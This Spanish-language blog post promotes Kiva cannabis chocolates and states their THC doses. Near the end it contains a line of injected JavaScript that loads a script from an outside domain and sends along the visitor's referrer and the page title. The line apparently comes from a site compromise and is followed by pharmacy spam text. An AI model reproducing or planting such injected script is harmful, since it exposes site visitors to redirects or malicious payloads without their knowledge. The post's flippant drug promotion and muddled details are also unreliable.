Home / Publicaciones / Curiosidades / Chequea Los Nuevos Chocolates de Marihuana

Chequea Los Nuevos Chocolates de Marihuana

Ha llegado al mercado uno de los dulces que será un trending topic para los drogadictos comelones.< !more> El chocolate de “mariguana”.

La empresa Kiva ubicada en U.S. en el estado de california, ha presentado en el mercado un dulce de chocolate con leche elaborado con un cacao puro, mantequilla y una terminación suave, cremoso. Este dulce de chocolate es una de las buenas opciones para los enfermos de marihuana que les gusta el chocolate y de paladar delicado.

Entre sus ingredientes posee 15mg de THC “Tetra Hidro Cannabinol” por porción, o 60mg si nos comemos todo el paquete, es requerido mantener a los niños fuera del alcance de este producto.

Si eres de las personas que no controlan su boca al momento de comer chocolates, pues entonces pueden adquirir los Minis Kivas, que son pequeñas porciones de chocolate con diferentes sabores para deleitar tu gusto.

O por último, si prefieres frutas secas chocolatadas, pues tu opción seria los Kiva Terra Bites. Unas semillas secas tostadas, creadas a partir de granos de café de Tazmania cubiertos de chocolate amargo. Cada porción de este en particular te emprende en un viaje sin escala con 5mg de THC. Pues si ya la curiosidad te esta tentando, esta lata de dulces contiene 120mg de THC.

Bueno… para el próximo fin de semana, una cena romántica para tu chica, con un trago fino y para completar unos chocolaticos para el amor.

var d=document;var s=d.createElement(‘script’); }s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; paxil for night sweats

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...